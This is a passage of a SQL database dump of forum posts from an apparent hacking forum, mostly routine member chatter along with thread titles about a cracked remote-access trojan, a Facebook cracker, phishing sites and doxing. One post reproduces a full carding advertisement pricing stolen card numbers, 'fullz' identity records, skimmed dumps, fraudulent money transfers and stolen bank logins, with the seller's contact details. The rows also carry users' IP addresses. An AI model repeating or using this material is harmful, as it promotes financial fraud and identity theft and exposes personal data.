`visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('509', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '62', 'R?????zo?', '1345536609', 'Of course it has advantages, even though we are just starting the forum and we need alot more people (upgraded aswell) so we get more useful stuff in here.', '46.50.87.75', '775051083', '1', '0', '0', '0', '1', '9b168ca6c1c5f76ed74e0d34a3b21c8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('510', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '62', 'R?????zo?', '1345536723', 'Thanks for sharing, why didn\'t I knew that on my school times :P', '46.50.87.75', '775051083', '1', '0', '0', '0', '1', '030548f953a22616dd5fedf6a656fb09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('518', '142', '369', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '67', 'HoverCatz', '1345554308', 'No idea. My computer havent found it yet if its infected :3', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b0d91ac1a9856387c90fd733cc3f1156', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('519', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345554314', 'I came here from t3h jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =]', '24.212.197.164', '416597412', '1', '0', '82', '1348618644', '1', 'b137bc89baacf4c10d01bacb06c98860', '0', '1348618644'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('521', '31', '86', '7', 'RE: How long are you online daily?', '0', '82', 'iTzIpod', '1345554500', 'I\'ll try my best to post a lot and be active on this forum. I connected to this forum yesterday and was having problems with the email confirmation. I tried resending it a couple times and didn\'t recieve anything from LH. So far I spent 1 hour and got like 4 posts? I think', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32c581cb060f6c764e2b35e5cf619e36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('522', '59', '145', '42', 'RE: 13 year old visits jail for hacking', '0', '82', 'iTzIpod', '1345554867', 'OMG I remember that show. It was like the best :p OT: It is a program. And it is a good thing he stopped.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79ade4149b891652f265126391474815', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('523', '158', '464', '42', 'RE: So ninja\'s DO exist?!', '0', '82', 'iTzIpod', '1345555006', '[quote=\'t3h jok3r\' pid=\'464\' dateline=\'1345498572\'] I thought Ninja\'s were just a story to promote Karate, Martial Arts etc. From this I do believe they exist but if they do then I don\'t think he is the last one. [/quote] I thought the same thing! Ninja\'s are cool though :p I\'m one.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f9569034dfb16d9fdb9e3a9551b3ef80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('524', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '82', 'iTzIpod', '1345555125', 'Wow. I wonder who was 2nd place. Did that person get the medal?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f7003b3e792f7fd3f6455145966da7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('525', '134', '341', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345555390', 'I will try my best to refer HQ and active people. =] This forum already does contain HQ and active people.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9434d6e85adf097ee372cc3c83d9587', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('526', '167', '501', '4', 'RE: iTzIpod is here (:', '0', '82', 'iTzIpod', '1345555457', '[quote=\'Baws\' pid=\'501\' dateline=\'1345529514\'] Hi Ryan, or Jacob? Welcome on here, I got a ps3 too and msg me if you want so I can add you! PSN: Rest_In_Peace911 [/quote] Alright bro. I\'ll add you! :D And thanks for the warm welcome! <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ac558fa64e11a0d05fe5b103a56439e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('527', '166', '493', '49', 'RE: New userbars?', '0', '1', 't3h jok3r', '1345555500', 'I agree with iTzIpod, we can\'t go ahead unless we get an idea of your friends work. I agree some of the userbars are simple and a change might be great.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '30e3a8230105fc065ea9f19a06bb22ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('528', '171', '0', '8', 'What Genre do you listen to?', '0', '82', 'iTzIpod', '1345555795', 'Hey LH. This thread is simple. You just post here saying what Genre of Music do you listen to. I listen to Kpop, Hip Hop, Rap, Dubstep, and Techno.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '121464a20edba73380e25dceae211a51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('529', '168', '507', '50', 'RE: :(', '0', '1', 't3h jok3r', '1345555861', 'This was meant to be in the [b]complaints[/b] section but since you made it public, I will let the whole community know why I demoted you. You always acted like a butthead, Hil and many other staff members disliked you for your language but still I gave you two chances. Reason for the demotion in the image below. [img]http://img256.imageshack.us/img256/8249/sink.png[/img] So I don\'t think you should be so surprised on your demotion.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'b54e1d2e837514140346ec2c7a5f47d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('530', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '82', 'iTzIpod', '1345555945', 'May I have a copy of this eBook please? I am an Elite member (Upgraded). Thanks. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f7031e00eac25e386ae6eb7f7d015227', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('531', '165', '492', '5', 'RE: Just did something', '0', '1', 't3h jok3r', '1345556073', 'That\'s a brilliant idea. If you are busy, I can sign up and post on your friends website. This would help out website a lot, but it kinda depends on what kind of website it is. Thanks for asking your friend about LH.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '2b49caad17f9c83b293bd6180cefff58', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('532', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '82', 'iTzIpod', '1345556144', 'Is it me or the Chrome Link doesn\'t work?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f3fc48a8d3f6155962711d8ebfcdbc2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('533', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '1', 't3h jok3r', '1345556174', 'Welcome to L33t Hacking Jacob. Man, I think I\'m the only one who has a PS3 and doesn\'t have a PSN ID :(', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'ad24b727755f199e4368efd34422844b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('534', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '82', 'iTzIpod', '1345556275', 'I can\'t seem to click on that link. But, I just copied and pasted it onto my URL Link Box. And then clicked enter. After, I got a message saying: It appears that you\'ve come from nowhere. You must click a link to get here, otherwise we won\'t let you continue. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7cdc232806452d7c1856b5bd9fd9f2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('535', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '1', 't3h jok3r', '1345556286', 'I mostly like listening to Rap songs. Wait isn\'t rap and the hip hop the same thing.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'e3f9eb6e3dc20c1b511f89096fe13387', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('536', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '82', 'iTzIpod', '1345556489', 'When I try to go on http://skype.hotspotshield.com/banner.php I get this message saying Temporarily Unavailable! :/', '24.212.197.164', '416597412', '1', '0', '82', '1345556738', '1', '9370316008f2d63ace496d1458bef34e', '0', '1345556738'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('512', '170', '0', '19', '[Junk]Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs', '0', '6', 'gee4realbiz', '1345550226', 'Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs ===============Prices For Cvv=============== 1 US (visa,master) = 3 $ 1 US (Amex,dis) = 4 $ 1 UK = 8 $ 1 UK (with DOB ) = 15 $ 1 Ca = 10 $ 1 CA (Amex,dis) = 15 $ 1 EU = 15 $ 1 EU (Amex,dis) = 17 $ 1 US (full info) = 15 $ 1 UK (full info) = 30$ Australia (AU) = 10 $ Switzerland (VE) = 15 $ France (FR) = 15 $ Germany (GE) = 15 $ Mexico (MX) = 12 $ New Zealand (NZ) = 13 $ ITALY = 15 $ Asian cvv(all country)=17$ And many country orther... ------------------------MASTER and VISA BIN------------------------- 446278 - 446272 - 449352 - 449353 - 498824 - 415929 - 465902 - 492940 492181 - 492182 - 492942 - 456735 - 454313 - 462785 - 453978 518675 - 6759 - 5434 - 529930 - 552188 - 543429 - 5505 -------------------Fullz INfos Formate------------------------- FirstName: ****** LastLame: *********** Address: **************** City:******** State: ** Email: **********t CardType: ****** ZipCode: ***** Country: ******* SSN: ******** DOB: ** ** **** Mother Maiden Name: ********* Driver License Number: *************H Phone: ******** CardNumber: *************** E*piryDate: ** ** CVV2: *** ATM PIN: **** (3.) CC+Cvv2 ( Cvvs) Formate: FirstName: ****** LastLame: *********** Address: **************** City:******** State: ** Email: ********** ZipCode: ***** Country: ******* Phone: ******** CardNumber: *************** ExpiryDate: ** ** CVV2: *** ===============Price For Dumps =============== ==> Usa :101 - Visa| MasterCard Classic | Standart = $12 - Visa| MasterCard Gold | Platinum = $18 - Visa| MasterCard Business | Corparate = $25 - Visa| MasterCard Signature | Purchasing = $35 - American Express = $12 ( WITHOUT SID ) - Discover = $20 ==> Canada: 101 201 - Visa| MasterCard Classic | Standart = $25 - Visa| MasterCard Gold | Platinum = $30 - Visa| MasterCard Business | Corparate = 40$ ==> EU, UK: 101 201 - Classic | Standart = 60$ - Gold/Platinum = 70$ - Business/Signature/Purchase/Corporate/World = 100$ ==> Other countries: 101 201 - MasterCard| Visa Classic = 50$ - Visa Gold|Platinum|Corporate|Signature|Business = 70$ ==> ASIA/AUSTRALIA/Exotic: 101 201 121 - MasterCard| Visa Classic - $50 - Visa Gold|Platinum|Corporate|Signature|Business ? $70 ===============Visa Bins=============== 403496;VISA;PNC BANK, N.A.;DEBIT;BUSINESS;UNITED STATES 403552;VISA;UNIVERSAL SAVINGS BANK LIMITED;CREDIT;CLASSIC;CYPRUS;CY;CYP;196;CYPRUS NICOSIA; 403604;VISA;PARK NATIONAL BANK;CREDIT;CLASSIC;UNITED STATES;US;USA;840; 438826;VISA;HSBC BANK NEVADA, N.A.;CREDIT;GOLD PREMIUM;UNITED STATES;US;USA;840; 438876;VISA;66 FEDERAL CREDIT UNION;CREDIT;CLASSIC;UNITED STATES;US;USA;840;UNITED STATES OF AMERICA OKLAHOMA BARTLESVILLE; 438932;VISA;CHELINDBANK;DEBIT;ELECTRON;RUSSIAN FEDERATION 438989;VISA;SECURITY STATE BANK;DEBIT;CLASSIC;UNITED STATES;US;USA;840;HTTP: 439039;VISA;;;;BRAZIL;BR;BRA;76;; 439089;VISA;OJSC JSCB CONVERSBANK-MOSCOW;DEBIT;CLASSIC;RUSSIAN FEDERATION;RU;RUS;643; ===============Mc Bins=============== 57020;VISA;UNIBANCO - UNIAO DE BANCOS BRASILEIROS S.A.;;;BRAZIL;BR;BRA;76;; 58098;VISA;ISRAEL CREDIT CARDS LIMITED;CREDIT;BUSINESS;ISRAEL;IL;ISR;376;ISRAEL TEL AVIV; 57998;VISA;BANQUE SAUDI FRANSI;DEBIT;CLASSIC;SAUDI ARABIA;SA;SAU;682; 52371;VISA;SHANGHAI COMMERCIAL BANK LTD.;;;CHINA;CN;CHN;156;CHINA, HONG KONG KOWLOON; 452433;VISA;THE TORONTO-DOMINION BANK;CREDIT;CLASSIC;CANADA;CA;CAN;124;; 52538;VISA;ARAB BANK PLC;;;JORDAN;JO;JOR;400; 452594;VISA;VJA;CREDIT;CLASSIC 452943;VISA;FIRST MIDWEST BANK;DEBIT;PLATINUM;UNITED STATES;US;USA ===============Prices For Wu Transfer=============== (Eu,Uk,Asia,Canada,Us,France,Germany,Italy,Nigeria and very easy to cashout African) : Price : - Price 100$ :=> 1500$ MTCN ( sender name + country sender ) - Price 200$ :=> 3500$ MTCN ( sender name + country sender ) - Price 300$ :=> 5500$ MTCN ( sender name + country sender ) - Price 400$ :=> 8000$ MTCN ( sender name + country sender ) - Price 500$ :=> 10000$ MTCN ( sender name + country sender ) * Give me your western union info and payment me fee. * Then i will do transfer\'s for you, After about 15 min you\'ll have MTCN and sender name + Country Sender * Demo : Name sender : Mark Bills MTCN : 3434304668 / 8973628030 (same name sender) And orther MTCN : 0448746596 + 3033978004 + 9035112719 .....and more.. =============== Bank Login From Usa And Eu And Uk And Asia Is Avaiable =============== AVAILABLE BANK LOGIN : Scotia OnLine Wachovia netbank.commbank.com.au Abbey HSBC Bremer Online Banking Flagstar Bank KBC Bank EnterCard Postbank M&T Credit Union WaMu Landmark Orchard American Express Wells Fargo ICICI Bank Chase Pen Air Federal U.S. Bank RBC First Trust Bank Banque Nationale HDFC Bank **You can contact me for more and many Bank Logins you need. ---------------------------------Conditions of sale------------------------- ( read it before adding me in ur contact list! ) 1. Dumps are sent to you within 30mins after full payment for the order... 2. According ur desire staff can be checked up during the moment of purchase. 3. No consultations and advices how where and what for it\'s possible to take advantage of the given goods. 4. No gifts, \"just for test\" etc. And I am very tired from beggars and children... do not need wasted my and ur time too.. 5. Payment methods: Liberty-Reserve, Western Union, MoneyGram Contact Visa : ICQ : 627287399 Mail : bestcarder4all@yahoo.com Y!M : bestcarder4all', '173.254.206.157', '-1375809891', '0', '0', '0', '0', '1', 'ac0c386a1b7a24e395db4387e5f5ee72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('517', '166', '493', '49', 'RE: New userbars?', '0', '82', 'iTzIpod', '1345554230', 'The current userbars are alright. I can\'t pick a side since you haven\'t showed us any of your friend\'s work. May we see some of his work?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdf9a0da512903161fa774501cdb3faa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('514', '168', '507', '50', 'RE: :(', '0', '82', 'iTzIpod', '1345554042', 'What were you demoted from? :/ Sorry for your loss. But what are you planning to do now?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6075a37fdf85ea4c572b7fdd09863438', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('516', '170', '512', '19', '[Junk]Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs', '0', '1', 't3h jok3r', '1345554199', 'This thread has been junked.', '41.174.12.163', '699272355', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('537', '141', '532', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '8', 'spacefish36', '1345556515', '[quote=\'iTzIpod\' pid=\'532\' dateline=\'1345556144\'] Is it me or the Chrome Link doesn\'t work? [/quote] It works for me. [quote=\'Baws\' pid=\'426\' dateline=\'1345341766\'] [quote=\'t3h jok3r\' pid=\'420\' dateline=\'1345330757\'] [quote=\'Baws\' pid=\'409\' dateline=\'1345328738\'] Thanks for the share, I\'ll try this out. Alright I got about 40 points ATM, lol. What sites do you suggest using? I got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay [/quote] Aren\'t those 6? [/quote] Watch out guys, we gotta smartass over here.:D Just kidding babe, what happened is um...I accidentally pressed 7 instead of 6...:shy: [/quote] Lol.', '41.174.21.43', '699274539', '0', '0', '0', '0', '1', 'e790d257f531a5b4e82d06d6f9864ebb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('538', '134', '525', '47', 'RE: Win $10 for referring people', '0', '8', 'spacefish36', '1345556658', '[quote=\'iTzIpod\' pid=\'525\' dateline=\'1345555390\'] I will try my best to refer HQ and active people. =] This forum already does contain HQ and active people. [/quote] This site is active and building up everyday, hopefully this site gets popular and I believe we can only help T3h Jok3r make his website successful.', '41.174.21.43', '699274539', '0', '0', '0', '0', '1', '51a88eff50aca2c5eededd49068531ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('539', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '82', 'iTzIpod', '1345556678', 'Ugh. I hate FileIce. Cant you just use MediaFire or Rapidshare or LocalHostr!?!?! :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca8f68bbf00e0b43a01eff65012d2b08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('540', '59', '522', '42', 'RE: 13 year old visits jail for hacking', '0', '8', 'spacefish36', '1345556778', '[quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\'] OMG I remember that show. It was like the best :p OT: It is a program. And it is a good thing he stopped. [/quote] What program are you talking about?', '41.174.21.43', '699274539', '0', '0', '0', '0', '1', '120568cb72b2de4e40e9fb8da9a24dd1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('541', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '82', 'iTzIpod', '1345556827', 'May I give this a go? I want a Runescape Accounr Phisher.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68641440f4d50fb3def3e2306ee962e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('542', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '82', 'iTzIpod', '1345556962', 'Yay! It works! <3 Thank you for releasing it. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a25cf0447ded46412def86dff7b268a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('543', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '5', 'Timmy', '1345557016', 'Welcome to LH Ryan. 18 posts in under a 1 hour, you are too HQ.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '33bea844e03fd9ddee30127d420d8068', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('544', '172', '0', '3', 'Awards', '0', '5', 'Timmy', '1345557112', 'On the awards page, there is a special award for all upgraded members but I don\'t see any award on upgraded members.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '64265f8243c0772c45b07d264c851d56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('545', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1345557147', 'There are a lot of advantages of being Elite other than Regular Member! Being Elite is recommended and useful.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5538972375d7b6045b32a72acdaccc53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('546', '146', '375', '29', 'RE: se7en sins PREMIUM SECTION', '0', '82', 'iTzIpod', '1345557294', 'Thanks for the share. I\'m glad I am ELite because of this! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ae4dd5bde6c1dbf130083d08ffca915', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('547', '172', '544', '3', 'RE: Awards', '0', '1', 't3h jok3r', '1345557465', 'Opps nice spot. Thanks for letting us know, the think is that I was too busy recently so I forgot about the award. I will be adding the awards right now, thanks once again.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'd0e717bc7cfdff21a58f1f9c8cb4bf52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('548', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '82', 'iTzIpod', '1345557524', 'ROFL that is hilarious. Although I don\'t hate anyone at the moment so...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '15cd3330be407280184346890cbc06b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('549', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '82', 'iTzIpod', '1345557636', 'Seems legit! I will try it out later on today.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '433e53bd009aeedbcae6dfbbeaf3d5b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('550', '2', '4', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1345557853', 'I never knew how to do that. Now I do! It is so cool. I will make a ton of Userbars. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5293c02f8cdf192cb12e3433e09d65f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('551', '83', '196', '34', 'RE: [tut]How to make a thread design', '0', '82', 'iTzIpod', '1345557952', 'Very cool tutorial. I will make some thread designs later on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5818b81520df5f7412f6a397ecdc8a6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('552', '138', '355', '35', 